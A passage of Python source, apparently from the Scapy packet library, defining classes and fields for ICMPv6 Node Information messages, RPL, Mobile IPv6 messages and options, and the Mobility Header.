    !!!  At the moment, compression is not implemented  !!!
    """
    if isinstance(x, bytes):
        if x.endswith(b'\x00'):  # stupid heuristic
            return x
        names = [x]
    else:
        names = x

    encoded = []
    for n in names:
        labels = n.split(b'.')
        # single-component gets one more
        termin = b"\x00\x00" if len(labels) == 1 else b"\x00"
        body = b"".join(chb(len(y)) + y for y in labels)
        encoded.append(body + termin)
    return b"".join(encoded)
2284
2285
def dnsrepr2names(x):
    """
    Decode a DNS wire-format byte string into the list of names it holds.

    Labels are joined with dots; a name is completed when a null length
    byte is met, and a second null byte right after it is skipped. Labels
    not followed by a terminating null byte are not returned. A length
    byte with any of its two top bits set raises an Exception, since
    compression is not supported. Result is a list of bytes.
    """
    names = []
    current = b""
    while x:
        label_len, x = orb(x[0]), x[1:]
        if label_len:
            if label_len & 0xc0:  # XXX TODO : work on that -- arno
                raise Exception("DNS message can't be compressed at this point!")  # noqa: E501
            current += x[:label_len] + b"."
            x = x[label_len:]
            continue
        # Null length byte: the current name is complete
        if current.endswith(b'.'):
            current = current[:-1]
        names.append(current)
        current = b""
        if x and orb(x[0]) == 0:  # single component
            x = x[1:]
    return names
2312
2313
2314class NIQueryDataField(StrField):
    def __init__(self, name, default):
        """Forward *name* and *default* unchanged to StrField.__init__()."""
        StrField.__init__(self, name, default)
2317
2318    def i2h(self, pkt, x):
2319        if x is None:
2320            return x
2321        t, val = x
2322        if t == 1:
2323            val = dnsrepr2names(val)[0]
2324        return val
2325
2326    def h2i(self, pkt, x):
2327        if x is tuple and isinstance(x[0], int):
2328            return x
2329
2330        # Try IPv6
2331        try:
2332            inet_pton(socket.AF_INET6, x.decode())
2333            return (0, x.decode())
2334        except Exception:
2335            pass
2336        # Try IPv4
2337        try:
2338            inet_pton(socket.AF_INET, x.decode())
2339            return (2, x.decode())
2340        except Exception:
2341            pass
2342        # Try DNS
2343        if x is None:
2344            x = b""
2345        x = names2dnsrepr(x)
2346        return (1, x)
2347
2348    def i2repr(self, pkt, x):
2349        t, val = x
2350        if t == 1:  # DNS Name
2351            # we don't use dnsrepr2names() to deal with
2352            # possible weird data extracted info
2353            res = []
2354            while val:
2355                tmp_len = orb(val[0])
2356                val = val[1:]
2357                if tmp_len == 0:
2358                    break
2359                res.append(plain_str(val[:tmp_len]) + ".")
2360                val = val[tmp_len:]
2361            tmp = "".join(res)
2362            if tmp and tmp[-1] == '.':
2363                tmp = tmp[:-1]
2364            return tmp
2365        return repr(val)
2366
2367    def getfield(self, pkt, s):
2368        qtype = getattr(pkt, "qtype")
2369        if qtype == 0:  # NOOP
2370            return s, (0, b"")
2371        else:
2372            code = getattr(pkt, "code")
2373            if code == 0:   # IPv6 Addr
2374                return s[16:], (0, inet_ntop(socket.AF_INET6, s[:16]))
2375            elif code == 2:  # IPv4 Addr
2376                return s[4:], (2, inet_ntop(socket.AF_INET, s[:4]))
2377            else:           # Name or Unknown
2378                return b"", (1, s)
2379
2380    def addfield(self, pkt, s, val):
2381        if ((isinstance(val, tuple) and val[1] is None) or
2382                val is None):
2383            val = (1, b"")
2384        t = val[0]
2385        if t == 1:
2386            return s + val[1]
2387        elif t == 0:
2388            return s + inet_pton(socket.AF_INET6, val[1])
2389        else:
2390            return s + inet_pton(socket.AF_INET, val[1])
2391
2392
class NIQueryCodeField(ByteEnumField):
    """Code field whose value, when unset, follows the 'data' field."""

    def i2m(self, pkt, x):
        """
        Return x, or a code derived from the 'data' field of pkt when
        x is None: 0 (IPv6 address) or 2 (IPv4 address) when 'data' is
        of that type, 1 (name) in every other case.
        """
        if x is not None:
            return x

        data = pkt.getfieldval("data")
        if data is None:
            return 1
        for address_code in (0, 2):
            if data[0] == address_code:
                return address_code
        # Names and unknown types
        return 1
2408
2409
2410_niquery_code = {0: "IPv6 Query", 1: "Name Query", 2: "IPv4 Query"}
2411
2412# _niquery_flags = {  2: "All unicast addresses", 4: "IPv4 addresses",
2413#                     8: "Link-local addresses", 16: "Site-local addresses",
2414#                    32: "Global addresses" }
2415
2416# "This NI type has no defined flags and never has a Data Field". Used
2417# to know if the destination is up and implements NI protocol.
2418
2419
class ICMPv6NIQueryNOOP(_ICMPv6NIHashret, _ICMPv6):
    """
    ICMPv6 Node Information query (type 139) with qtype 0 (NOOP).

    The other NI query classes derive from this one and only change
    class-level values.
    """
    name = "ICMPv6 Node Information Query - NOOP Query"
    fields_desc = [
        ByteEnumField("type", 139, icmp6types),
        # Left to None, the code is computed by NIQueryCodeField
        NIQueryCodeField("code", None, _niquery_code),
        XShortField("cksum", None),
        ShortEnumField("qtype", 0, icmp6_niqtypes),
        BitField("unused", 0, 10),
        FlagsField("flags", 0, 6, "TACLSG"),
        NonceField("nonce", None),
        NIQueryDataField("data", None),
    ]
2430
2431
class ICMPv6NIQueryName(ICMPv6NIQueryNOOP):
    """
    Same fields as ICMPv6NIQueryNOOP, with 'qtype' set to 2 at class
    level (the qtype _niquery_guesser() maps to this class for queries).
    """
    name = "ICMPv6 Node Information Query - IPv6 Name Query"
    qtype = 2
2435
2436# We ask for the IPv6 address of the peer
2437
2438
class ICMPv6NIQueryIPv6(ICMPv6NIQueryNOOP):
    """
    Same fields as ICMPv6NIQueryNOOP, with 'qtype' set to 3 and 'flags'
    set to 0x3E (every bit of the 6-bit field but the lowest one) at
    class level.
    """
    name = "ICMPv6 Node Information Query - IPv6 Address Query"
    qtype = 3
    flags = 0x3E
2443
2444
class ICMPv6NIQueryIPv4(ICMPv6NIQueryNOOP):
    """
    Same fields as ICMPv6NIQueryNOOP, with 'qtype' set to 4 at class
    level (the qtype _niquery_guesser() maps to this class for queries).
    """
    name = "ICMPv6 Node Information Query - IPv4 Address Query"
    qtype = 4
2448
2449
2450_nireply_code = {0: "Successful Reply",
2451                 1: "Response Refusal",
2452                 3: "Unknown query type"}
2453
2454_nireply_flags = {1: "Reply set incomplete",
2455                  2: "All unicast addresses",
2456                  4: "IPv4 addresses",
2457                  8: "Link-local addresses",
2458                  16: "Site-local addresses",
2459                  32: "Global addresses"}
2460
# The internal representation is one of the following:
# (0, "some string") : unknown qtype values are mapped to this one
# (3, [ (ttl, ip6), ... ])
# (4, [ (ttl, ip4), ... ])
# (2, [ttl, dns_names]) : dns_names is a single string that contains
#     all the DNS names. Internally it is kept ready to be sent
#     (undissected); i2repr() decodes it for the user. This makes
#     building after dissection bijective.
#
# getfield() and m2i() are merged, as are addfield() and i2m().
2471
2472
class NIReplyDataField(StrField):
    """
    Data field of ICMPv6 Node Information replies.

    The internal value is a (qtype, value) tuple: (2, [ttl, names in
    DNS format]), (3, [(ttl, ip6), ...]), (4, [(ttl, ip4), ...]) or
    (0, raw string) for anything else.
    """

    def i2h(self, pkt, x):
        """Return the value part; DNS names are decoded after the TTL."""
        if x is None:
            return x
        kind, payload = x
        if kind == 2:
            ttl, packed_names = payload
            return [ttl] + dnsrepr2names(packed_names)
        return payload

    def h2i(self, pkt, x):
        """
        Build the internal tuple from a user value.

        The user may give a (qtype, value) tuple. Otherwise the 'qtype'
        of pkt is used when a packet is available, and 0 (plain string)
        when it is not.
        """
        if isinstance(x, tuple):
            # User hint: first element is the qtype, second the value
            qtype, x = x[0], x[1]
        elif pkt is not None:
            qtype = pkt.qtype
        else:
            qtype = 0

        if qtype == 2:  # DNS name
            if isinstance(x, (str, bytes)):
                x = [x]  # a lone name becomes a one element list
            if isinstance(x, list):
                x = [item.encode() if isinstance(item, str) else item
                     for item in x]
            # An integer in first position is the TTL
            has_ttl = x and isinstance(x[0], six.integer_types)
            ttl = x[0] if has_ttl else 0
            names = x[1:] if has_ttl else x
            return (2, [ttl, names2dnsrepr(names)])

        if qtype in (3, 4):  # IPv6 or IPv4 addresses
            if not isinstance(x, list):
                x = [x]  # a lone address instead of a list
            entries = []
            for entry in x:
                if not isinstance(entry, tuple):
                    # No TTL given with the address: use 0
                    entry = (0, entry)
                if six.PY3 and isinstance(entry[1], bytes):
                    entry = (entry[0], entry[1].decode())
                entries.append(entry)
            return (qtype, entries)

        return (qtype, x)

    def addfield(self, pkt, s, val):
        """Append the wire form of the internal value val to s."""
        kind, payload = val
        if payload is None:
            payload = b""

        if kind == 2:
            ttl, packed_names = payload
            return s + struct.pack("!I", ttl) + packed_names

        if kind == 3 or kind == 4:
            family = socket.AF_INET6 if kind == 3 else socket.AF_INET
            return s + b"".join(
                struct.pack("!I", entry[0]) + inet_pton(family, entry[1])
                for entry in payload
            )

        return s + payload

    def getfield(self, pkt, s):
        """
        Dissect the field from s, based on 'code' and 'qtype' of pkt.

        Returns the (remaining bytes, internal value) tuple.
        """
        if pkt.code != 0:
            return s, (0, b"")

        qtype = pkt.qtype
        if qtype == 0:  # NOOP
            return s, (0, b"")

        if qtype == 2:
            if len(s) < 4:
                return s, (0, b"")
            ttl, = struct.unpack("!I", s[:4])
            return b"", (2, [ttl, s[4:]])

        # Address lists: records made of a 4-byte TTL and an address
        # XXX TODO : get the real length
        if qtype == 3:  # IPv6 addresses with TTLs
            kind, family, record_len = 3, socket.AF_INET6, 20  # 4 + 16
        elif qtype == 4:  # IPv4 addresses with TTLs
            kind, family, record_len = 4, socket.AF_INET, 8  # 4 + 4
        else:
            # XXX TODO : implement me and deal with real length
            return b"", (0, s)

        records = []
        while len(s) >= record_len:
            ttl, = struct.unpack("!I", s[:4])
            records.append((ttl, inet_ntop(family, s[4:record_len])))
            s = s[record_len:]
        return s, (kind, records)

    def i2repr(self, pkt, x):
        """Return the printable form of the internal value."""
        if x is None:
            return "[]"

        if not (isinstance(x, tuple) and len(x) == 2):
            return repr(x)  # XXX should not happen

        kind, payload = x
        if kind == 2:  # DNS names
            ttl, packed_names = payload
            decoded = [plain_str(n) for n in dnsrepr2names(packed_names)]
            return "ttl:%d %s" % (ttl, ",".join(decoded))
        if kind == 3 or kind == 4:
            pairs = ["(%d, %s)" % (entry[0], entry[1]) for entry in payload]
            return "[ %s ]" % ", ".join(pairs)
        return repr(payload)
2596
2597# By default, sent responses have code set to 0 (successful)
2598
2599
class ICMPv6NIReplyNOOP(_ICMPv6NIAnswers, _ICMPv6NIHashret, _ICMPv6):
    """
    ICMPv6 Node Information reply (type 140) with qtype 0 (NOOP).

    The other NI reply classes derive from this one and only change
    class-level values.
    """
    name = "ICMPv6 Node Information Reply - NOOP Reply"
    fields_desc = [
        ByteEnumField("type", 140, icmp6types),
        ByteEnumField("code", 0, _nireply_code),
        XShortField("cksum", None),
        ShortEnumField("qtype", 0, icmp6_niqtypes),
        BitField("unused", 0, 10),
        FlagsField("flags", 0, 6, "TACLSG"),
        NonceField("nonce", None),
        NIReplyDataField("data", None),
    ]
2610
2611
class ICMPv6NIReplyName(ICMPv6NIReplyNOOP):
    """
    Same fields as ICMPv6NIReplyNOOP, with 'qtype' set to 2 at class
    level (the qtype _niquery_guesser() maps to this class for replies
    with code 0).
    """
    name = "ICMPv6 Node Information Reply - Node Names"
    qtype = 2
2615
2616
class ICMPv6NIReplyIPv6(ICMPv6NIReplyNOOP):
    """
    Same fields as ICMPv6NIReplyNOOP, with 'qtype' set to 3 at class
    level (the qtype _niquery_guesser() maps to this class for replies
    with code 0).
    """
    name = "ICMPv6 Node Information Reply - IPv6 addresses"
    qtype = 3
2620
2621
class ICMPv6NIReplyIPv4(ICMPv6NIReplyNOOP):
    """
    Same fields as ICMPv6NIReplyNOOP, with 'qtype' set to 4 at class
    level (the qtype _niquery_guesser() maps to this class for replies
    with code 0).
    """
    name = "ICMPv6 Node Information Reply - IPv4 addresses"
    qtype = 4
2625
2626
class ICMPv6NIReplyRefuse(ICMPv6NIReplyNOOP):
    """
    Same fields as ICMPv6NIReplyNOOP, with 'code' set to 1 at class
    level (the code _niquery_guesser() maps to this class).
    """
    name = "ICMPv6 Node Information Reply - Responder refuses to supply answer"
    code = 1
2630
2631
class ICMPv6NIReplyUnknown(ICMPv6NIReplyNOOP):
    """
    Same fields as ICMPv6NIReplyNOOP, with 'code' set to 2 at class
    level (the code _niquery_guesser() maps to this class).
    """
    name = "ICMPv6 Node Information Reply - Qtype unknown to the responder"
    code = 2
2635
2636
def _niquery_guesser(p):
    """
    Return the class to use to dissect the Node Information message p.

    Queries (type 139) are selected on their qtype. Replies (type 140)
    are selected on their code and, for code 0, on their qtype.
    conf.raw_layer is returned when no class can be selected.
    """
    fallback = conf.raw_layer
    msg_type = orb(p[0])

    if msg_type == 139:  # Node Info Query specific stuff
        if len(p) <= 6:
            return fallback
        qtype = struct.unpack("!H", p[4:6])[0]
        query_classes = {
            0: ICMPv6NIQueryNOOP,
            2: ICMPv6NIQueryName,
            3: ICMPv6NIQueryIPv6,
            4: ICMPv6NIQueryIPv4,
        }
        return query_classes.get(qtype, conf.raw_layer)

    if msg_type == 140:  # Node Info Reply specific stuff
        code = orb(p[1])
        if code == 1:
            return ICMPv6NIReplyRefuse
        if code == 2:
            return ICMPv6NIReplyUnknown
        if code == 0 and len(p) > 6:
            qtype = struct.unpack("!H", p[4:6])[0]
            reply_classes = {
                2: ICMPv6NIReplyName,
                3: ICMPv6NIReplyIPv6,
                4: ICMPv6NIReplyIPv4,
            }
            return reply_classes.get(qtype, ICMPv6NIReplyNOOP)

    return fallback
2660
2661
2662#############################################################################
2663#############################################################################
2664#     Routing Protocol for Low Power and Lossy Networks RPL (RFC 6550)      #
2665#############################################################################
2666#############################################################################
2667
2668# https://www.iana.org/assignments/rpl/rpl.xhtml#control-codes
# Names of the RPL control message codes
rplcodes = {
    0: "DIS",
    1: "DIO",
    2: "DAO",
    3: "DAO-ACK",
    # 4: "P2P-DRO",
    # 5: "P2P-DRO-ACK",
    # 6: "Measurement",
    7: "DCO",
    8: "DCO-ACK",
}
2678
2679
class ICMPv6RPL(_ICMPv6):   # RFC 6550
    """ICMPv6 header (type 155) of RPL control messages."""
    name = 'RPL'
    fields_desc = [
        ByteEnumField("type", 155, icmp6types),
        ByteEnumField("code", 0, rplcodes),
        XShortField("cksum", None),
    ]
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1a"}}
2686
2687
2688#############################################################################
2689#############################################################################
2690#               Mobile IPv6 (RFC 3775) and Nemo (RFC 3963)                  #
2691#############################################################################
2692#############################################################################
2693
2694# Mobile IPv6 ICMPv6 related classes
2695
class ICMPv6HAADRequest(_ICMPv6):
    """ICMPv6 Home Agent Address Discovery Request (type 144)."""
    name = 'ICMPv6 Home Agent Address Discovery Request'
    fields_desc = [ByteEnumField("type", 144, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   XShortField("id", None),
                   BitEnumField("R", 1, 1, {1: 'MR'}),
                   XBitField("res", 0, 15)]

    def hashret(self):
        """Return the 2-byte identifier followed by the payload hash."""
        # 'id' defaults to None, which struct.pack() rejects: an unset
        # identifier is hashed as 0.
        return struct.pack("!H", self.id or 0) + self.payload.hashret()
2707
2708
class ICMPv6HAADReply(_ICMPv6):
    """ICMPv6 Home Agent Address Discovery Reply (type 145)."""
    name = 'ICMPv6 Home Agent Address Discovery Reply'
    fields_desc = [ByteEnumField("type", 145, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   XShortField("id", None),
                   BitEnumField("R", 1, 1, {1: 'MR'}),
                   XBitField("res", 0, 15),
                   IP6ListField('addresses', None)]

    def hashret(self):
        """Return the 2-byte identifier followed by the payload hash."""
        # 'id' defaults to None, which struct.pack() rejects: an unset
        # identifier is hashed as 0.
        return struct.pack("!H", self.id or 0) + self.payload.hashret()

    def answers(self, other):
        """Tell if this reply answers the HAAD request other."""
        if not isinstance(other, ICMPv6HAADRequest):
            return 0
        # An identifier left unset (None) on either side is compared as
        # 0, consistently with hashret().
        return (self.id or 0) == (other.id or 0)
2726
2727
class ICMPv6MPSol(_ICMPv6):
    """ICMPv6 Mobile Prefix Solicitation (type 146)."""
    name = 'ICMPv6 Mobile Prefix Solicitation'
    fields_desc = [ByteEnumField("type", 146, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   XShortField("id", None),
                   XShortField("res", 0)]

    def hashret(self):
        """Return the 2-byte identifier, as ICMPv6MPAdv.hashret() does."""
        # 'id' defaults to None, which struct.pack() rejects: an unset
        # identifier is hashed as 0.
        return struct.pack("!H", self.id or 0)

    # The method used to be (mis)named _hashret, and was thus never used
    # as the hash of the packet. The old name is kept for existing callers.
    _hashret = hashret
2738
2739
class ICMPv6MPAdv(_ICMPv6NDGuessPayload, _ICMPv6):
    """ICMPv6 Mobile Prefix Advertisement (type 147)."""
    name = 'ICMPv6 Mobile Prefix Advertisement'
    fields_desc = [ByteEnumField("type", 147, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   XShortField("id", None),
                   BitEnumField("flags", 2, 2, {2: 'M', 1: 'O'}),
                   XBitField("res", 0, 14)]

    def hashret(self):
        """Return the 2-byte identifier."""
        # 'id' defaults to None, which struct.pack() rejects: an unset
        # identifier is hashed as 0.
        return struct.pack("!H", self.id or 0)

    def answers(self, other):
        """Tell if other is a Mobile Prefix Solicitation."""
        return isinstance(other, ICMPv6MPSol)
2754
2755# Mobile IPv6 Options classes
2756
2757
2758_mobopttypes = {2: "Binding Refresh Advice",
2759                3: "Alternate Care-of Address",
2760                4: "Nonce Indices",
2761                5: "Binding Authorization Data",
2762                6: "Mobile Network Prefix (RFC3963)",
2763                7: "Link-Layer Address (RFC4068)",
2764                8: "Mobile Node Identifier (RFC4283)",
2765                9: "Mobility Message Authentication (RFC4285)",
2766                10: "Replay Protection (RFC4285)",
2767                11: "CGA Parameters Request (RFC4866)",
2768                12: "CGA Parameters (RFC4866)",
2769                13: "Signature (RFC4866)",
2770                14: "Home Keygen Token (RFC4866)",
2771                15: "Care-of Test Init (RFC4866)",
2772                16: "Care-of Test (RFC4866)"}
2773
2774
class _MIP6OptAlign(Packet):
    """ Base class of the Mobile IPv6 options, which have alignment
    requirements of the form x*n+y. It computes the padding required
    before an option, i.e. the need for a Pad1 or PadN option. Options
    only have to provide x and y as class parameters (x=0 and y=0 mean
    that no alignment is required)."""

    __slots__ = ["x", "y"]

    def alignment_delta(self, curpos):
        """Return the number of padding bytes needed at offset curpos."""
        period, offset = self.x, self.y
        if period == 0 and offset == 0:
            return 0
        # Smallest n such that period * n + offset is not before curpos
        n = (curpos - offset + period - 1) // period
        return period * n + offset - curpos

    def extract_padding(self, p):
        """Hand every remaining byte back as padding."""
        return b"", p
2794
2795
class MIP6OptBRAdvice(_MIP6OptAlign):
    """Mobile IPv6 Binding Refresh Advice option (type 2)."""
    name = 'Mobile IPv6 Option - Binding Refresh Advice'
    fields_desc = [
        ByteEnumField('otype', 2, _mobopttypes),
        ByteField('olen', 2),
        ShortField('rinter', 0),
    ]
    # alignment requirement: 2n
    x = 2
    y = 0
2803
2804
class MIP6OptAltCoA(_MIP6OptAlign):
    """Mobile IPv6 Alternate Care-of Address option (type 3)."""
    name = 'MIPv6 Option - Alternate Care-of Address'
    fields_desc = [
        ByteEnumField('otype', 3, _mobopttypes),
        ByteField('olen', 16),
        IP6Field("acoa", "::"),
    ]
    # alignment requirement: 8n+6
    x = 8
    y = 6
2812
2813
class MIP6OptNonceIndices(_MIP6OptAlign):
    """Mobile IPv6 Nonce Indices option (type 4)."""
    name = 'MIPv6 Option - Nonce Indices'
    fields_desc = [ByteEnumField('otype', 4, _mobopttypes),
                   # Option data is made of two 16-bit indices: 4 bytes
                   ByteField('olen', 4),
                   ShortField('hni', 0),
                   ShortField('coni', 0)]
    x = 2
    y = 0  # alignment requirement: 2n
2822
2823
class MIP6OptBindingAuthData(_MIP6OptAlign):
    """Mobile IPv6 Binding Authorization Data option (type 5)."""
    name = 'MIPv6 Option - Binding Authorization Data'
    fields_desc = [ByteEnumField('otype', 5, _mobopttypes),
                   # Length of the authenticator below: 96 bits, 12 bytes
                   ByteField('olen', 12),
                   BitField('authenticator', 0, 96)]
    x = 8
    y = 2  # alignment requirement: 8n+2
2831
2832
class MIP6OptMobNetPrefix(_MIP6OptAlign):  # NEMO - RFC 3963
    """NEMO Mobile Network Prefix option (type 6)."""
    name = 'NEMO Option - Mobile Network Prefix'
    fields_desc = [
        ByteEnumField("otype", 6, _mobopttypes),
        ByteField("olen", 18),
        ByteField("reserved", 0),
        ByteField("plen", 64),
        IP6Field("prefix", "::"),
    ]
    # alignment requirement: 8n+4
    x = 8
    y = 4
2842
2843
class MIP6OptLLAddr(_MIP6OptAlign):  # Sect 6.4.4 of RFC 4068
    """Mobile IPv6 Link-Layer Address option (type 7)."""
    name = "MIPv6 Option - Link-Layer Address (MH-LLA)"
    fields_desc = [
        ByteEnumField("otype", 7, _mobopttypes),
        ByteField("olen", 7),
        ByteEnumField("ocode", 2, _rfc4068_lla_optcode),
        ByteField("pad", 0),
        # Only support ethernet
        MACField("lla", ETHER_ANY),
    ]
    # alignment requirement: none
    x = 0
    y = 0
2853
2854
class MIP6OptMNID(_MIP6OptAlign):  # RFC 4283
    """Mobile IPv6 Mobile Node Identifier option (type 8)."""
    name = "MIPv6 Option - Mobile Node Identifier"
    fields_desc = [
        ByteEnumField("otype", 8, _mobopttypes),
        # olen covers 'id' plus the 1-byte 'subtype'
        FieldLenField(
            "olen", None, length_of="id", fmt="B",
            adjust=lambda pkt, x: x + 1,
        ),
        ByteEnumField("subtype", 1, {1: "NAI"}),
        StrLenField(
            "id", "",
            length_from=lambda pkt: pkt.olen - 1,
        ),
    ]
    # alignment requirement: none
    x = 0
    y = 0
2865
2866# We only support decoding and basic build. Automatic HMAC computation is
2867# too much work for our current needs. It is left to the user (I mean ...
2868# you). --arno
2869
2870
class MIP6OptMsgAuth(_MIP6OptAlign):  # RFC 4285 (Sect. 5)
    """Mobile IPv6 Mobility Message Authentication option (type 9)."""
    name = "MIPv6 Option - Mobility Message Authentication"
    fields_desc = [
        ByteEnumField("otype", 9, _mobopttypes),
        # olen covers 'authdata' plus 'subtype' (1 byte) and 'mspi' (4)
        FieldLenField(
            "olen", None, length_of="authdata", fmt="B",
            adjust=lambda pkt, x: x + 5,
        ),
        ByteEnumField(
            "subtype", 1,
            {
                1: "MN-HA authentication mobility option",
                2: "MN-AAA authentication mobility option",
            },
        ),
        IntField("mspi", None),
        StrLenField(
            "authdata", "A" * 12,
            length_from=lambda pkt: pkt.olen - 5,
        ),
    ]
    # alignment requirement: 4n+1
    x = 4
    y = 1
2883
2884# Extracted from RFC 1305 (NTP) :
2885# NTP timestamps are represented as a 64-bit unsigned fixed-point number,
2886# in seconds relative to 0h on 1 January 1900. The integer part is in the
2887# first 32 bits and the fraction part in the last 32 bits.
2888
2889
class NTPTimestampField(LongField):
    """64-bit NTP timestamp: 32-bit seconds since 1900, 32-bit fraction."""

    def i2repr(self, pkt, x):
        """Return the timestamp as a UTC date followed by the raw value."""
        # Values below roughly 50 years (of 365 days) after 1900 are
        # not converted to a date
        if x < ((50 * 31536000) << 32):
            return "Some date a few decades ago (%d)" % x

        # Offset between the NTP epoch (January 1st 1900, 0h) and the
        # Unix epoch (January 1st 1970, 0h) expected by gmtime(): 70
        # years including 17 leap days, i.e. 25567 days of 86400 seconds
        delta = -2208988800
        i = int(x >> 32)  # integer part: seconds
        j = float(x & 0xffffffff) * 2.0**-32  # fraction part
        res = i + j + delta
        t = strftime("%a, %d %b %Y %H:%M:%S +0000", gmtime(res))

        return "%s (%d)" % (t, x)
2904
2905
class MIP6OptReplayProtection(_MIP6OptAlign):  # RFC 4285 (Sect. 6)
    """Mobile IPv6 Replay Protection option (type 10)."""
    name = "MIPv6 option - Replay Protection"
    fields_desc = [
        ByteEnumField("otype", 10, _mobopttypes),
        ByteField("olen", 8),
        NTPTimestampField("timestamp", 0),
    ]
    # alignment requirement: 8n+2
    x = 8
    y = 2
2913
2914
class MIP6OptCGAParamsReq(_MIP6OptAlign):  # RFC 4866 (Sect. 5.6)
    """Mobile IPv6 CGA Parameters Request option (type 11), no data."""
    name = "MIPv6 option - CGA Parameters Request"
    fields_desc = [
        ByteEnumField("otype", 11, _mobopttypes),
        ByteField("olen", 0),
    ]
    # alignment requirement: none
    x = 0
    y = 0
2921
2922# XXX TODO: deal with CGA param fragmentation and build of defragmented
2923# XXX       version. Passing of a big CGAParam structure should be
2924# XXX       simplified. Make it hold packets, by the way  --arno
2925
2926
class MIP6OptCGAParams(_MIP6OptAlign):  # RFC 4866 (Sect. 5.1)
    """Mobile IPv6 CGA Parameters option (type 12)."""
    name = "MIPv6 option - CGA Parameters"
    fields_desc = [
        ByteEnumField("otype", 12, _mobopttypes),
        FieldLenField("olen", None, length_of="cgaparams", fmt="B"),
        StrLenField(
            "cgaparams", "",
            length_from=lambda pkt: pkt.olen,
        ),
    ]
    # alignment requirement: none
    x = 0
    y = 0
2935
2936
class MIP6OptSignature(_MIP6OptAlign):  # RFC 4866 (Sect. 5.2)
    """Mobile IPv6 Signature option (type 13)."""
    name = "MIPv6 option - Signature"
    fields_desc = [
        ByteEnumField("otype", 13, _mobopttypes),
        FieldLenField("olen", None, length_of="sig", fmt="B"),
        StrLenField(
            "sig", "",
            length_from=lambda pkt: pkt.olen,
        ),
    ]
    # alignment requirement: none
    x = 0
    y = 0
2945
2946
class MIP6OptHomeKeygenToken(_MIP6OptAlign):  # RFC 4866 (Sect. 5.3)
    """Mobile IPv6 Home Keygen Token option (type 14)."""
    name = "MIPv6 option - Home Keygen Token"
    fields_desc = [
        ByteEnumField("otype", 14, _mobopttypes),
        FieldLenField("olen", None, length_of="hkt", fmt="B"),
        StrLenField(
            "hkt", "",
            length_from=lambda pkt: pkt.olen,
        ),
    ]
    # alignment requirement: none
    x = 0
    y = 0
2955
2956
class MIP6OptCareOfTestInit(_MIP6OptAlign):  # RFC 4866 (Sect. 5.4)
    """Mobile IPv6 Care-of Test Init option (type 15), no data."""
    name = "MIPv6 option - Care-of Test Init"
    fields_desc = [
        ByteEnumField("otype", 15, _mobopttypes),
        ByteField("olen", 0),
    ]
    # alignment requirement: none
    x = 0
    y = 0
2963
2964
class MIP6OptCareOfTest(_MIP6OptAlign):  # RFC 4866 (Sect. 5.5)
    """Mobile IPv6 Care-of Test option (type 16)."""
    name = "MIPv6 option - Care-of Test"
    fields_desc = [
        ByteEnumField("otype", 16, _mobopttypes),
        FieldLenField("olen", None, length_of="cokt", fmt="B"),
        StrLenField(
            "cokt", b'\x00' * 8,
            length_from=lambda pkt: pkt.olen,
        ),
    ]
    # alignment requirement: none
    x = 0
    y = 0
2973
2974
class MIP6OptUnknown(_MIP6OptAlign):
    """
    Generic Mobile IPv6 option, holding the option data as a string.

    Its dispatch hook selects the class registered in moboptcls for
    the option type found in the first byte, if any.
    """
    name = 'Scapy6 - Unknown Mobility Option'
    fields_desc = [
        ByteEnumField("otype", 6, _mobopttypes),
        FieldLenField("olen", None, length_of="odata", fmt="B"),
        StrLenField(
            "odata", "",
            length_from=lambda pkt: pkt.olen,
        ),
    ]
    # alignment requirement: none
    x = 0
    y = 0

    @classmethod
    def dispatch_hook(cls, _pkt=None, *_, **kargs):
        """Return the class matching the option type of _pkt, or cls."""
        if not _pkt:
            return cls
        # First byte is the option type
        return moboptcls.get(orb(_pkt[0]), cls)
2991
2992
# Class implementing each mobility option type, as looked up by
# MIP6OptUnknown.dispatch_hook()
moboptcls = {
    0: Pad1,
    1: PadN,
    2: MIP6OptBRAdvice,
    3: MIP6OptAltCoA,
    4: MIP6OptNonceIndices,
    5: MIP6OptBindingAuthData,
    6: MIP6OptMobNetPrefix,
    7: MIP6OptLLAddr,
    8: MIP6OptMNID,
    9: MIP6OptMsgAuth,
    10: MIP6OptReplayProtection,
    11: MIP6OptCGAParamsReq,
    12: MIP6OptCGAParams,
    13: MIP6OptSignature,
    14: MIP6OptHomeKeygenToken,
    15: MIP6OptCareOfTestInit,
    16: MIP6OptCareOfTest,
}
3010
3011
3012# Main Mobile IPv6 Classes
3013
# Names of the Mobility Header message types
mhtypes = {
    0: 'BRR',
    1: 'HoTI',
    2: 'CoTI',
    3: 'HoT',
    4: 'CoT',
    5: 'BU',
    6: 'BA',
    7: 'BE',
    8: 'Fast BU',
    9: 'Fast BA',
    10: 'Fast NA',
}
3025
3026# From http://www.iana.org/assignments/mobility-parameters
# Names of the status values, below 128 first
bastatus = {
    0: 'Binding Update accepted',
    1: 'Accepted but prefix discovery necessary',
    128: 'Reason unspecified',
    129: 'Administratively prohibited',
    130: 'Insufficient resources',
    131: 'Home registration not supported',
    132: 'Not home subnet',
    133: 'Not home agent for this mobile node',
    134: 'Duplicate Address Detection failed',
    135: 'Sequence number out of window',
    136: 'Expired home nonce index',
    137: 'Expired care-of nonce index',
    138: 'Expired nonces',
    139: 'Registration type change disallowed',
    140: 'Mobile Router Operation not permitted',
    141: 'Invalid Prefix',
    142: 'Not Authorized for Prefix',
    143: 'Forwarding Setup failed (prefixes missing)',
    144: 'MIPV6-ID-MISMATCH',
    145: 'MIPV6-MESG-ID-REQD',
    146: 'MIPV6-AUTH-FAIL',
    147: 'Permanent home keygen token unavailable',
    148: 'CGA and signature verification failed',
    149: 'Permanent home keygen token exists',
    150: 'Non-null home nonce index expected',
}
3052
3053
class _MobilityHeader(Packet):
    """Base class of the Mobility Header messages: fills in the length
    and checksum of the header at build time."""
    name = 'Dummy IPv6 Mobility Header'
    overload_fields = {IPv6: {"nh": 135}}

    def post_build(self, p, pay):
        """
        Return header and payload with the length (byte 1) and the
        checksum (bytes 4-5) set, each computed unless set by the user.
        """
        data = p + pay

        hdr_len = self.len
        if hdr_len is None:
            # Unit is 8 bytes, the first 8 bytes being excluded
            hdr_len = (len(data) - 8) // 8
        data = data[:1] + struct.pack("B", hdr_len) + data[2:]

        cksum = self.cksum
        if cksum is None:
            cksum = in6_chksum(135, self.underlayer, data)
        return data[:4] + struct.pack("!H", cksum) + data[6:]
3070
3071
